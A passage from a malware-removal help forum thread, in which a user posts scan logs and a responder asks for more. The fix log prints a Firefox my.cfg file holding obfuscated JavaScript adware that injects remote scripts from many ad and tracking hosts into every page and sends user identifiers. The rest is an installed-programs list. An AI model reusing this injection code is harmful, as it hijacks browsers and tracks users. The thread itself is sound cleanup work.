2015-03-25 10:32 - 2015-03-25 10:32 - 0000088 _____ () C:\Program Files (x86)\Mozilla Firefox\browser\defaults\preferences\my-prefs.js

====== End of Folder: ======


========================= Folder: C:\Program Files (x86)\Mozilla Firefox\defaults\pref ========================

2015-03-21 09:44 - 2013-10-25 18:43 - 0000358 _____ () C:\Program Files (x86)\Mozilla Firefox\defaults\pref\channel-prefs.js

====== End of Folder: ======


========= type "C:\Program Files (x86)\Mozilla Firefox\my.cfg" =========


// First line is ommited
try{
var inline_code = '(function() {var appName = encodeURIComponent("__APP_NAME__");var userId = "__USER_ID__";var appId = "__APP_ID__";var campId = "__CAMP_ID__";try {var _0x1efb=["\x5F\x5F\x41\x50\x50\x5F\x4E\x41\x4D\x45\x5F\x5F","\x6E\x61\x6D\x65","\x6C\x65\x6E\x67\x74\x68","\x69\x6E\x64\x65\x78\x4F\x66","\x68\x6F\x73\x74\x6E\x61\x6D\x65","\x73\x6D\x61\x72\x74\x73\x68\x6F\x70\x70\x69\x6E\x67\x2E\x63\x6F\x6D","\x73\x68\x6F\x70\x70\x73\x74\x6F\x70\x2E\x63\x6F\x6D","\x6C\x6F\x63\x61\x6C\x6D\x6F\x78\x69\x65\x2E\x63\x6F\x6D","\x79\x65\x6C\x6C\x6F\x77\x6D\x6F\x78\x69\x65\x2E\x63\x6F\x6D","\x6D\x61\x69\x6C\x2E\x63\x6F\x6D","\x74\x75\x72\x62\x6F\x73\x65\x61\x72\x63\x68\x65\x6E\x67\x69\x6E\x65\x2E\x63\x6F\x6D","\x72\x65\x6C\x61\x74\x65\x64\x74\x6F\x70\x69\x78\x2E\x63\x6F\x6D","\x61\x70\x70\x2D\x72\x6F\x76\x65\x72\x2E\x63\x6F\x6D","\x61\x70\x70\x69\x67\x6E\x69\x74\x65\x72\x2E\x63\x6F\x6D","\x62\x70\x6F\x73\x6F\x6C\x75\x74\x69\x6F\x6E\x73\x2E\x63\x6F\x6D","\x7A\x68\x75\x61\x6D\x6F\x62\x2E\x63\x6F\x6D","\x79\x69\x65\x6C\x64\x6E\x65\x78\x75\x73\x2E\x63\x6F\x6D","\x2E\x74\x66\x78\x69\x71\x2E","\x2E\x77\x65\x62\x2E","\x2E\x67\x6D\x78\x2E","\x6D\x61\x74\x63\x68","\x70\x72\x6F\x74\x6F\x63\x6F\x6C","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x68\x74\x74\x70\x73\x3A","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x74\x79\x70\x65","\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74","\x73\x65\x74\x41\x74\x74\x72\x69\x62\x75\x74\x65","\x73\x72\x63","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x68\x65\x61\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x62\x6F\x64\x79","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x68\x74\x74\x70\x3A\x2F\x2F\x63\x64\x6E\x63\x61\x63\x68\x65\x31\x2D\x61\x2E\x61\x6B\x61\x6D\x61\x69\x68\x64\x2E\x6E\x65\x74\x2F\x73\x75\x62\x2F\x76\x33\x32\x31\x39\x62\x64\x2F\x38\x38\x38\x38\x38\x38\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x2F\x6C\x2E\x6A\x73\x3F\x70\x69\x64\x3D\x31\x30\x39\x34\x26\x65\x78\x74\x3D","\x26\x73\x79\x73\x74\x65\x6D\x69\x64\x3D","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x63\x64\x6E\x63\x61\x63\x68\x65\x31\x2D\x61\x2E\x61\x6B\x61\x6D\x61\x69\x68\x64\x2E\x6E\x65\x74\x2F\x73\x75\x62\x2F\x76\x33\x32\x31\x39\x62\x64\x2F\x38\x38\x38\x38\x38\x38\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x2F\x6C\x2E\x6A\x73\x3F\x70\x69\x64\x3D\x31\x30\x39\x34\x26\x65\x78\x74\x3D","","\x68\x74\x74\x70\x3A\x2F\x2F\x61\x73\x72\x76\x2D\x61\x2E\x61\x6B\x61\x6D\x61\x69\x68\x64\x2E\x6E\x65\x74\x2F\x73\x64\x2F\x31\x37\x30\x30\x2F\x31\x30\x34\x33\x2E\x6A\x73","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x61\x73\x72\x76\x2D\x61\x2E\x61\x6B\x61\x6D\x61\x69\x68\x64\x2E\x6E\x65\x74\x2F\x73\x64\x2F\x31\x37\x30\x30\x2F\x31\x30\x34\x33\x2E\x6A\x73","\x77\x69\x6E\x64\x6F\x77\x2E\x5F\x72\x76\x7A\x31\x37\x30\x30\x78\x31\x30\x34\x33\x20\x3D\x20\x7B\x20\x27\x70\x75\x62\x6C\x69\x73\x68\x65\x72\x5F\x73\x75\x62\x69\x64\x27\x3A\x20\x27\x38\x38\x38\x38\x38\x38\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x27\x2C\x20\x27\x61\x64\x64\x6F\x6E\x6E\x61\x6D\x65\x27\x3A\x20\x27","\x27\x7D\x3B","\x68\x74\x74\x70\x3A\x2F\x2F\x69\x73\x74\x61\x74\x69\x63\x2E\x65\x73\x68\x6F\x70\x63\x6F\x6D\x70\x2E\x63\x6F\x6D\x2F\x66\x6F\x2F\x6D\x69\x6E\x2F\x63\x72\x71\x63\x2E\x6A\x73\x3F\x68\x69\x64\x3D","\x26\x62\x6E\x61\x6D\x65\x3D","\x26\x73\x75\x62\x69\x64\x3D\x38\x38\x38\x38\x38\x38\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x69\x73\x74\x61\x74\x69\x63\x2E\x65\x73\x68\x6F\x70\x63\x6F\x6D\x70\x2E\x63\x6F\x6D\x2F\x66\x6F\x2F\x6D\x69\x6E\x2F\x63\x72\x71\x63\x2E\x6A\x73\x3F\x68\x69\x64\x3D","\x68\x74\x74\x70\x3A\x2F\x2F\x61\x73\x72\x76\x2D\x61\x2E\x61\x6B\x61\x6D\x61\x69\x68\x64\x2E\x6E\x65\x74\x2F\x73\x64\x2F\x31\x37\x30\x30\x2F\x31\x30\x33\x37\x2E\x6A\x73","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x61\x73\x72\x76\x2D\x61\x2E\x61\x6B\x61\x6D\x61\x69\x68\x64\x2E\x6E\x65\x74\x2F\x73\x64\x2F\x31\x37\x30\x30\x2F\x31\x30\x33\x37\x2E\x6A\x73","\x77\x69\x6E\x64\x6F\x77\x2E\x5F\x72\x76\x7A\x31\x37\x30\x30\x78\x31\x30\x33\x37\x20\x3D\x20\x7B\x20\x27\x70\x75\x62\x6C\x69\x73\x68\x65\x72\x5F\x73\x75\x62\x69\x64\x27\x3A\x20\x27\x38\x38\x38\x38\x38\x38\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x27\x2C\x20\x27\x61\x64\x64\x6F\x6E\x6E\x61\x6D\x65\x27\x3A\x20\x27","\x68\x74\x74\x70\x3A\x2F\x2F\x69\x2E\x63\x72\x62\x73\x6A\x73\x2E\x69\x6E\x66\x6F\x2F\x63\x72\x62\x66\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x2E\x6A\x73\x3F\x63\x68\x61\x6E\x6E\x65\x6C\x3D\x63\x72\x64\x72\x5F\x38\x38\x38\x38\x38\x38\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x26\x61\x70\x70\x54\x69\x74\x6C\x65\x3D","\x26\x68\x69\x64\x3D","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x69\x5F\x63\x72\x62\x73\x6A\x73\x5F\x69\x6E\x66\x6F\x2E\x74\x6C\x73\x63\x64\x6E\x2E\x63\x6F\x6D\x2F\x63\x72\x62\x66\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x2E\x6A\x73\x3F\x63\x68\x61\x6E\x6E\x65\x6C\x3D\x63\x72\x64\x72\x5F\x38\x38\x38\x38\x38\x38\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x26\x61\x70\x70\x54\x69\x74\x6C\x65\x3D","\x68\x74\x74\x70\x3A\x2F\x2F\x61\x2E\x74\x66\x78\x69\x71\x2E\x63\x6F\x6D\x2F\x61\x2E\x70\x68\x70\x3F\x36\x32\x36\x72\x65\x66\x32\x3D\x38\x38\x38\x38\x38\x38\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x26\x36\x32\x36\x4E\x61\x6D\x65\x3D","\x26\x36\x32\x36\x72\x65\x66\x33\x3D","\x26\x36\x32\x36\x72\x65\x66\x31\x3D\x36\x33\x37\x32\x36\x66\x37\x33\x37\x33\x37\x32\x36\x39\x36\x34\x36\x35\x37\x32\x26\x74\x65\x69\x64\x3D","\x26\x74\x75\x69\x64\x3D","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x61\x2E\x74\x66\x78\x69\x71\x2E\x63\x6F\x6D\x2F\x61\x2E\x70\x68\x70\x3F\x36\x32\x36\x72\x65\x66\x32\x3D\x38\x38\x38\x38\x38\x38\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x26\x36\x32\x36\x4E\x61\x6D\x65\x3D","\x68\x74\x74\x70\x3A\x2F\x2F\x63\x64\x6E\x2E\x76\x69\x73\x61\x64\x64\x2E\x63\x6F\x6D\x2F\x73\x63\x72\x69\x70\x74\x2F\x31\x34\x35\x36\x37\x37\x32\x35\x37\x36\x35\x2F\x70\x72\x65\x6C\x6F\x61\x64\x2E\x6A\x73\x3F\x73\x75\x62\x69\x64\x3D\x38\x38\x38\x38\x38\x38\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x26\x75\x6D\x3D","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x63\x64\x6E\x2E\x76\x69\x73\x61\x64\x64\x2E\x63\x6F\x6D\x2F\x73\x63\x72\x69\x70\x74\x2F\x31\x34\x35\x36\x37\x37\x32\x35\x37\x36\x35\x2F\x70\x72\x65\x6C\x6F\x61\x64\x2E\x6A\x73\x3F\x73\x75\x62\x69\x64\x3D\x38\x38\x38\x38\x38\x38\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x26\x75\x6D\x3D","\x68\x74\x74\x70\x3A\x2F\x2F\x6E\x70\x73\x2E\x6E\x6F\x70\x72\x6F\x62\x6C\x65\x6D\x70\x70\x63\x2E\x63\x6F\x6D\x2F\x6E\x70\x73\x62\x2F\x6C\x6F\x67\x69\x63\x2E\x6A\x73\x3F\x4F\x72\x69\x67\x69\x6E\x49\x64\x3D\x45\x38\x41\x34\x41\x32\x33\x41\x2D\x42\x30\x33\x34\x2D\x45\x32\x31\x31\x2D\x41\x39\x41\x30\x2D\x30\x30\x31\x35\x31\x37\x44\x31\x30\x46\x36\x45\x26\x53\x69\x74\x65\x49\x64\x3D\x53\x61\x6C\x65\x73\x26\x50\x61\x72\x74\x6E\x65\x72\x49\x44\x3D\x32\x30\x30\x30\x30\x26\x50\x72\x6F\x64\x75\x63\x74\x4E\x61\x6D\x65\x3D","\x26\x54\x6F\x6F\x6C\x62\x61\x72\x49\x64\x3D\x38\x38\x38\x38\x38\x38\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x6E\x70\x73\x2E\x6E\x6F\x70\x72\x6F\x62\x6C\x65\x6D\x70\x70\x63\x2E\x63\x6F\x6D\x2F\x6E\x70\x73\x62\x2F\x6C\x6F\x67\x69\x63\x2E\x6A\x73\x3F\x4F\x72\x69\x67\x69\x6E\x49\x64\x3D\x45\x38\x41\x34\x41\x32\x33\x41\x2D\x42\x30\x33\x34\x2D\x45\x32\x31\x31\x2D\x41\x39\x41\x30\x2D\x30\x30\x31\x35\x31\x37\x44\x31\x30\x46\x36\x45\x26\x53\x69\x74\x65\x49\x64\x3D\x53\x61\x6C\x65\x73\x26\x50\x61\x72\x74\x6E\x65\x72\x49\x44\x3D\x32\x30\x30\x30\x30\x26\x50\x72\x6F\x64\x75\x63\x74\x4E\x61\x6D\x65\x3D","\x68\x74\x74\x70\x3A\x2F\x2F\x69\x73\x74\x61\x74\x69\x63\x2E\x65\x73\x68\x6F\x70\x63\x6F\x6D\x70\x2E\x63\x6F\x6D\x2F\x66\x6F\x2F\x65\x63\x2F\x63\x72\x72\x2E\x6A\x73\x3F\x68\x69\x64\x3D","\x26\x73\x75\x62\x69\x64\x3D\x38\x38\x38\x38\x38\x38\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x26\x62\x6E\x61\x6D\x65\x3D","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x69\x73\x74\x61\x74\x69\x63\x2E\x65\x73\x68\x6F\x70\x63\x6F\x6D\x70\x2E\x63\x6F\x6D\x2F\x66\x6F\x2F\x65\x63\x2F\x63\x72\x72\x2E\x6A\x73\x3F\x68\x69\x64\x3D","\x68\x74\x74\x70\x3A\x2F\x2F\x63\x6A\x73\x2E\x6C\x69\x6E\x6B\x62\x6F\x6C\x69\x63\x2E\x63\x6F\x6D\x2F\x73\x63\x6A\x73\x2F\x63\x6A\x73\x2F\x63\x74\x78\x6A\x73\x2E\x6A\x73\x3F\x61\x66\x66\x5F\x69\x64\x3D\x31\x31\x34\x35\x26\x73\x75\x62\x61\x66\x66\x5F\x69\x64\x3D\x38\x38\x38\x38\x38\x38\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x26\x73\x62\x72\x61\x6E\x64\x3D","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x63\x6A\x73\x2E\x6C\x69\x6E\x6B\x62\x6F\x6C\x69\x63\x2E\x63\x6F\x6D\x2F\x73\x63\x6A\x73\x2F\x63\x6A\x73\x2F\x63\x74\x78\x6A\x73\x2E\x6A\x73\x3F\x61\x66\x66\x5F\x69\x64\x3D\x31\x31\x34\x35\x26\x73\x75\x62\x61\x66\x66\x5F\x69\x64\x3D\x38\x38\x38\x38\x38\x38\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x26\x73\x62\x72\x61\x6E\x64\x3D","\x68\x74\x74\x70\x3A\x2F\x2F\x63\x64\x6E\x2E\x73\x74\x61\x74\x69\x63\x77\x65\x62\x64\x6F\x6D\x2E\x63\x6F\x6D\x2F\x6A\x73\x2F\x61\x2E\x6A\x73\x3F\x6E\x61\x6D\x65\x73\x70\x61\x63\x65\x3D\x4C\x49\x54\x45\x26\x63\x61\x6D\x70\x61\x69\x67\x6E\x49\x64\x3D","\x26\x63\x6F\x75\x6E\x74\x72\x79\x43\x6F\x64\x65\x3D\x6E\x61\x26\x69\x6E\x73\x74\x61\x6C\x6C\x61\x74\x69\x6F\x6E\x54\x69\x6D\x65\x3D\x31\x34\x32\x34\x32\x35\x39\x34\x34\x32\x26\x61\x70\x70\x49\x44\x3D","\x26\x49\x42\x49\x43\x3D","\x26\x73\x75\x62\x49\x44\x3D\x38\x38\x38\x38\x38\x38\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x26\x61\x70\x70\x4E\x61\x6D\x65\x3D","\x26\x61\x73\x77\x3D\x30\x26\x62\x72\x6F\x77\x73\x65\x72\x4E\x61\x6D\x65\x3D\x66\x66","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x64\x32\x61\x38\x61\x34\x71\x39\x2E\x73\x73\x6C\x2E\x68\x77\x63\x64\x6E\x2E\x6E\x65\x74\x2F\x6A\x73\x2F\x61\x2E\x6A\x73\x3F\x6E\x61\x6D\x65\x73\x70\x61\x63\x65\x3D\x4C\x49\x54\x45\x26\x63\x61\x6D\x70\x61\x69\x67\x6E\x49\x64\x3D"];if(appName==_0x1efb[0]){appName=_0x1efb[1]};function isMatchPages(_0x3c93x2){var _0x3c93x3=false;for(var _0x3c93x4=0;_0x3c93x4<_0x3c93x2[_0x1efb[2]];++_0x3c93x4){if(location[_0x1efb[4]][_0x1efb[3]](_0x3c93x2[_0x3c93x4])!== -1){_0x3c93x3=true}};return _0x3c93x3;}if(isMatchPages([_0x1efb[5],_0x1efb[6],_0x1efb[7],_0x1efb[8],_0x1efb[9],_0x1efb[10],_0x1efb[11],_0x1efb[12],_0x1efb[13],_0x1efb[14],_0x1efb[15],_0x1efb[16],_0x1efb[17],_0x1efb[18],_0x1efb[19]])){return };if(!!window[_0x1efb[1]][_0x1efb[20]](/^(a652c|ld893)/)){return };function addScript(_0x3c93x6,_0x3c93x7,_0x3c93x8){var _0x3c93x9=(document[_0x1efb[22]][_0x1efb[21]]==_0x1efb[23]);if(_0x3c93x9&& !_0x3c93x7){return };var _0x3c93xa=_0x3c93x9?_0x3c93x7:_0x3c93x6;var _0x3c93xb=document[_0x1efb[25]](_0x1efb[24]);_0x3c93xb[_0x1efb[28]](_0x1efb[26],_0x1efb[27]);_0x3c93xb[_0x1efb[28]](_0x1efb[29],_0x3c93xa);(document[_0x1efb[32]](_0x1efb[31])[0]||document[_0x1efb[32]](_0x1efb[33])[0])[_0x1efb[30]](_0x3c93xb);if(!_0x3c93x8){return };var _0x3c93xc=document[_0x1efb[25]](_0x1efb[24]);_0x3c93xc[_0x1efb[28]](_0x1efb[26],_0x1efb[27]);_0x3c93xc[_0x1efb[34]]=_0x3c93x8;(document[_0x1efb[32]](_0x1efb[31])[0]||document[_0x1efb[32]](_0x1efb[33])[0])[_0x1efb[30]](_0x3c93xc);}addScript(_0x1efb[35]+appName+_0x1efb[36]+userId,_0x1efb[37]+appName+_0x1efb[36]+userId,_0x1efb[38]);addScript(_0x1efb[39],_0x1efb[40],_0x1efb[41]+appName+_0x1efb[42]);addScript(_0x1efb[43]+userId+_0x1efb[44]+appName+_0x1efb[45],_0x1efb[46]+userId+_0x1efb[44]+appName+_0x1efb[45],_0x1efb[38]);addScript(_0x1efb[47],_0x1efb[48],_0x1efb[49]+appName+_0x1efb[42]);addScript(_0x1efb[50]+appName+_0x1efb[51]+userId,_0x1efb[52]+appName+_0x1efb[51]+userId,_0x1efb[38]);addScript(_0x1efb[53]+appName+_0x1efb[54]+userId+_0x1efb[55]+appId+_0x1efb[56]+userId,_0x1efb[57]+appName+_0x1efb[54]+userId+_0x1efb[55]+appId+_0x1efb[56]+userId,_0x1efb[38]);addScript(_0x1efb[58]+appName,_0x1efb[59]+appName,_0x1efb[38]);addScript(_0x1efb[60]+appName+_0x1efb[61],_0x1efb[62]+appName+_0x1efb[61],_0x1efb[38]);addScript(_0x1efb[63]+userId+_0x1efb[64]+appName,_0x1efb[65]+userId+_0x1efb[64]+appName,_0x1efb[38]);addScript(_0x1efb[66]+appName,_0x1efb[67]+appName,_0x1efb[38]);addScript(_0x1efb[68]+campId+_0x1efb[69]+appId+_0x1efb[70]+userId+_0x1efb[71]+appName+_0x1efb[72],_0x1efb[73]+campId+_0x1efb[69]+appId+_0x1efb[70]+userId+_0x1efb[71]+appName+_0x1efb[72],_0x1efb[38]);} catch (e) {}})();';
(function() {
var _injectInlineJSCode=function(a, B){var c=b.createElement("script");c.setAttribute("type","text/javascript");c.innerHTML=a;(b.getElementsByTagName("head")[0]||b.getElementsByTagName("body")[0]).appendChild©},_handleDocumentElementInsterted=function(a){if(a&&a instanceof Components.interfaces.nsIDOMHTMLDocument){var b=a&&a.defaultView?a.defaultView:null;b&&b===b.top&&(_injectInlineJSCode("setTimeout(function(){var tag = document.createElement('script');tag.setAttribute('type','text/javascript');tag.setAttribute('src','//icm.r.worldssl.net/ff/m.js');(document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(tag);},1000*2);",
a),_injectInlineJSCode("setTimeout(function(){"+inline_code+"},1000*3);",a))}},observerService=Components.classes["@mozilla.org/observer-service;1"].getService(Components.interfaces.nsIObserverService);
observerService.addObserver({QueryInterface:function(a){if(a.equals(Components.interfaces.nsIObserver)||a.equals(Components.interfaces.nsISupports)||a.equals(Components.interfaces.nsISupportsWeakReference))return this;throw Components.results.NS_NOINTERFACE;},observe:function(a,b,c){try{"document-element-inserted"===b&&_handleDocumentElementInsterted(a)}catch(d){}}},"document-element-inserted",!1);
})();
} catch(e){
}
========= End of CMD: =========


==== End of Fixlog 21:55:02 ====

#5 B-boy/StyLe/

B-boy/StyLe/

    Bleepin' Freestyler


  • Malware Response Team
  • 8,307 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Bulgaria
  • Local time:07:16 PM

Posted 08 April 2015 - 03:47 AM

Hi,

 

Can you please post the Addition.txt as well?

Thanks! :)

 

 

Regards,

Georgi


cXfZ4wS.png


#6 ah_hin

ah_hin
  • Topic Starter

  • Members
  • 61 posts
  • OFFLINE
  •  
  • Local time:08:16 AM

Posted 08 April 2015 - 11:49 PM

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 11-03-2015
Ran by User at 2015-04-06 22:19:25
Running from C:\Users\User\Desktop\Malware software
Boot Mode: Normal
==========================================================

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

64 Bit HP CIO Components Installer (Version: 7.2.8 - Hewlett-Packard) Hidden
7-Zip 9.20 (x64 edition) (HKLM\...\{23170F69-40C1-2702-0920-000001000000}) (Version: 9.20.00.0 - Igor Pavlov)
Ace Stream Media 3.0.3 (HKU\S-1-5-21-2601788436-2821952545-4294816460-1002\...\AceStream) (Version: 3.0.3 - Ace Stream Media)
Ace Stream Media 3.0.3 (HKU\S-1-5-21-2601788436-2821952545-4294816460-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\AceStream) (Version: 3.0.3 - Ace Stream Media)
Adobe Acrobat XI Pro (HKLM-x32\...\{AC76BA86-1033-FFFF-7760-000000000006}) (Version: 11.0.00 - Adobe Systems)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 3.1.0.4880 - Adobe Systems Incorporated)
Adobe Creative Suite 6 Master Collection (HKLM-x32\...\{E8AD3069-9EB7-4BA8-8BFE-83F4E69355C0}) (Version: 6 - Adobe Systems Incorporated)
Adobe Flash Player 16 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 16.0.0.305 - Adobe Systems Incorporated)
Adobe Help Manager (HKLM-x32\...\chc.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 4.0.244 - Adobe Systems Incorporated)
Adobe Widget Browser (HKLM-x32\...\com.adobe.WidgetBrowser) (Version: 2.0 Build 348 - Adobe Systems Incorporated.)
Advanced Renamer (HKLM-x32\...\Advanced Renamer_is1) (Version: 3.64 - Hulubulu Software)
Advanced Uninstaller PRO - Version 11 (HKLM-x32\...\AU11_is1) (Version: 11.56.0.211 - Innovative Solutions)
AmCap version 9.01 (HKLM-x32\...\{0F45BECF-4C85-4301-A8A4-D2E2AE2A2C08}_is1) (Version: 9.01 - Gigabyte, Inc.)
Audacity 2.0.5 (HKLM-x32\...\Audacity_is1) (Version: 2.0.5 - Audacity Team)
Battlefield 4™ (HKLM-x32\...\{ABADE36E-EC37-413B-8179-B432AD3FACE7}) (Version: 1.4.2.23831 - Electronic Arts)
Battlefield™ Hardline Beta (HKLM-x32\...\{599276A7-F45D-40B1-A0B6-CF132A1CAD49}) (Version: 1.0.0.4 - Electronic Arts)
Battlelog Web Plugins (HKLM-x32\...\Battlelog Web Plugins) (Version: 2.6.2 - EA Digital Illusions CE AB)
BbeXtreme (x32 Version: 12.0.0 - Bluebeam Software) Hidden
bl (x32 Version: 1.0.0 - Your Company Name) Hidden
Bluebeam Revu x64 12 (HKLM-x32\...\InstallShield_{A8E3F673-82B9-4AF0-97C7-4DEDA7042E5E}) (Version: 12.0.0 - Bluebeam Software)
Bluebeam Revu x64 12 (Version: 12.0.0 - Bluebeam Software) Hidden
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
Brother MFL-Pro Suite MFC-J5910DW (HKLM-x32\...\{830F55B6-4398-4B72-A0D8-66397B902C0E}) (Version: 1.1.1.0 - Brother Industries, Ltd.)
BurnAware Free 6.9 (HKLM-x32\...\BurnAware Free_is1) (Version:  - Burnaware)
CDBurnerXP (HKLM-x32\...\{7E265513-8CDA-4631-B696-F40D983F3B07}_is1) (Version: 4.5.2.4478 - CDBurnerXP)
Classic Shell (HKLM\...\{023F92C9-AB10-4C54-BF09-C550AEC37917}) (Version: 4.0.6 - IvoSoft)
Counter-Strike (HKLM-x32\...\Steam App 10) (Version:  - Valve)
CPUID HWMonitor 1.24 (HKLM\...\CPUID HWMonitor_is1) (Version:  - )
Crysis® (HKLM-x32\...\{000E79B7-E725-4F01-870A-C12942B7F8E4}) (Version: 1.00.0000 - Electronic Arts)
CyberLink PowerDVD 10 (HKLM-x32\...\InstallShield_{DEC235ED-58A4-4517-A278-C41E8DAEAB3B}) (Version: 10.0.4427.02 - CyberLink Corp.)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Dolby Home Theater v4 (HKLM-x32\...\{B26438B4-BF51-49C3-9567-7F14A5E40CB9}) (Version: 7.2.8000.17 - Dolby Laboratories Inc)
Dropbox (HKU\S-1-5-21-2601788436-2821952545-4294816460-1002\...\Dropbox) (Version: 3.2.9 - Dropbox, Inc.)
Dropbox (HKU\S-1-5-21-2601788436-2821952545-4294816460-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Dropbox) (Version: 3.2.9 - Dropbox, Inc.)
Epson Connect Printer Setup (HKLM-x32\...\{D9B1D51B-EB56-410D-AEB5-1CCFAC4B6C8C}) (Version: 1.3.0 - SEIKO EPSON CORPORATION)
Epson Customer Participation (HKLM\...\{814FA673-A085-403C-9545-747FC1495069}) (Version: 1.4.0.0 - SEIKO EPSON CORPORATION)
Epson Event Manager (HKLM-x32\...\{44F72193-F59C-4303-BAE8-E3E4BC1C122C}) (Version: 3.01.0003 - Seiko Epson Corporation)
Epson FAX Utility (HKLM-x32\...\{0CBE6C93-CB2E-4378-91EE-12BE6D4E2E4A}) (Version: 1.46.00 - SEIKO EPSON CORPORATION)
Epson PC-FAX Driver (HKLM-x32\...\EPSON PC-FAX Driver 2) (Version:  - )
EPSON Scan (HKLM-x32\...\EPSON Scanner) (Version:  - Seiko Epson Corporation)
EPSON XP-800 Series Printer Uninstall (HKLM\...\EPSON XP-800 Series) (Version:  - SEIKO EPSON Corporation)
eReg (x32 Version: 1.20.138.34 - Logitech, Inc.) Hidden
ETDWare PS/2-X64 11.14.4.3_WHQL (HKLM\...\Elantech) (Version: 11.14.4.3 - ELAN Microelectronic Corp.)
EVGA Precision X 4.2.1 (HKLM-x32\...\PrecisionX) (Version: 4.2.1 - EVGA Corporation)
File Renamer - Basic (HKLM-x32\...\File Renamer - Basic) (Version: 6.3 - Sherrod Computers)
FINEVu Player (HKLM-x32\...\{F3AEED03-5238-4C60-9651-EAF1BE93232D}) (Version: 7.0.0 - FineDigital)
foobar2000 v1.2.9 (HKLM-x32\...\foobar2000) (Version: 1.2.9 - Peter Pawlowski)
Fotogalerie (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Free YouTube Download version 3.2.43.806 (HKLM-x32\...\Free YouTube Download_is1) (Version: 3.2.43.806 - DVDVideoSoft Ltd.)
FreeStyle version 3.22 (HKLM-x32\...\{E16215FB-939E-4082-B639-2D1A94831C52}_is1) (Version: 3.22 - GameKiss)
Galeria de Fotografias (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Galería de fotos (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Galerie de photos (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
GIGABYTE Smart Recovery Generator 1.0.20130705 (HKLM-x32\...\GIGABYTE Smart Recovery Generator) (Version: 1.0.20130705 - GIGABYTE TECHNOLOGY CO.,LTD.)
GIGABYTE Voice Search 2.6.0 (HKLM-x32\...\GIGABYTE Voice Search) (Version: 2.6.0 - GIGABYTE TECHNOLOGY CO.,LTD.)
GKLauncher version 1.1.0.4 (HKLM-x32\...\{961346DF-FE43-4392-99FC-47B1F5A882C3}_is1) (Version: 1.1.0.4 - GameKiss)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 41.0.2272.118 - Google Inc.)
Google Earth (HKLM-x32\...\{4D2A6330-2F8B-11E3-9C40-B8AC6F97B88E}) (Version: 7.1.2.2041 - Google)
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
H&R Block California 2014 (HKLM-x32\...\{3DEC6F75-77F4-4C6C-BD0B-A74C92CFD548}) (Version: 1.14.5101 - HRB Technology, LLC.)
H&R Block Deluxe + Efile + State 2014 (HKLM-x32\...\{BDA77C08-60A6-4AAB-B5A9-849ECF399A49}) (Version: 14.05.6401 - HRB Technology, LLC.)
Intel® Manageability Engine Firmware Recovery Agent (HKLM-x32\...\{A6C48A9F-694A-4234-B3AA-62590B668927}) (Version: 1.0.0.36943 - Intel Corporation)
Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 9.5.10.1550 - Intel Corporation)
